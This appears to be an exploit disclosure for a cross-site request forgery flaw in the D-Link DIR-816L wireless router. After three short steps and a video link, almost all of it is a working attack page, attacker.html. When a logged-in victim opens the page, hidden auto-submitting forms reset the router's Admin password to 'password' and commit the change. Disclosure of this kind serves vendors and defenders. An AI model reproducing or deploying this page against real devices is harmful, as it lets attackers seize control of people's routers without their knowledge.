User login to DIR-816L wireless router
User visits the attacker’s malicious web page (attacker.html)
attacker.html exploits CSRF vulnerability and changes the admin account password
PoC video link: http://youtu.be/UBdR2sUc8Wg
Exploit code (attacker.html):
<html>
<body>
<iframe style="display:none" name="hiddenpost"></iframe>
<form action="http://192.168.0.1/hedwig.cgi" method="POST" enctype="text/plain" target="hiddenpost" id="csrf">
<input type="hidden" name="<?xml version" value=""1.0" encoding="UTF-8"?> <postxml> <module> 	<service>DEVICE.ACCOUNT</service> 	<device> 		<gw_name>DIR-816L</gw_name> 		 		<account> 			<seqno>1</seqno> 			<max>2</max> 			<count>1</count> 			<entry> 				<uid>USR-</uid> 				<name>Admin</name> 				<usrid/> 				<password>password</password> 				<group>0</group> 				<description/> 			</entry> 		</account> 		<group> 			<seqno/> 			<max/> 			<count>0</count> 		</group> 		<session> 			<captcha>1</captcha> 			<dummy/> 			<timeout>180</timeout> 			<maxsession>128</maxsession> 			<maxauthorized>16</maxauthorized> 		</session> 	</device> </module> <module> 	<service>HTTP.WAN-1</service> 	<inf> 		<web></web> 		<https_rport></https_rport> 		<stunnel>1</stunnel> 		<weballow> 			<hostv4ip/> 		</weballow> 		<inbfilter/> 	</inf> 	 </module> <module> 	<service>HTTP.WAN-2</service> 	<inf> 		<active>0</active> 		<nat>NAT-1</nat> 		<web/> 		<weballow> 			<hostv4ip/> 		</weballow> 	</inf> 	 </module> <module> 	<service>INBFILTER</service> 	<acl> 		<inbfilter>		 						<seqno>1</seqno> 			<max>24</max> 			<count>0</count> 		</inbfilter>		 	</acl> 	<ACTIVATE>ignore</ACTIVATE> <FATLADY>ignore</FATLADY><SETCFG>ignore</SETCFG></module> <module> 	<service>SHAREPORT</service> 	<FATLADY>ignore</FATLADY> 	 <ACTIVATE>ignore</ACTIVATE></module> <module> 	<service>SAMBA</service> 	<samba>		 		     		<enable>1</enable> 		<auth>1</auth>     </samba> </module> </postxml>" />
</form>
<script>alert("This is CSRF PoC");document.getElementById("csrf").submit()</script>
<iframe style="display:none" name="hiddencommit"></iframe>
<form action="http://192.168.0.1/pigwidgeon.cgi" method="POST" target="hiddencommit" id="csrf1">
<input type="hidden" name="ACTIONS" value="SETCFG,SAVE,ACTIVATE" />
</form>
<script>document.getElementById("csrf1").submit()</script>
</body>
</html>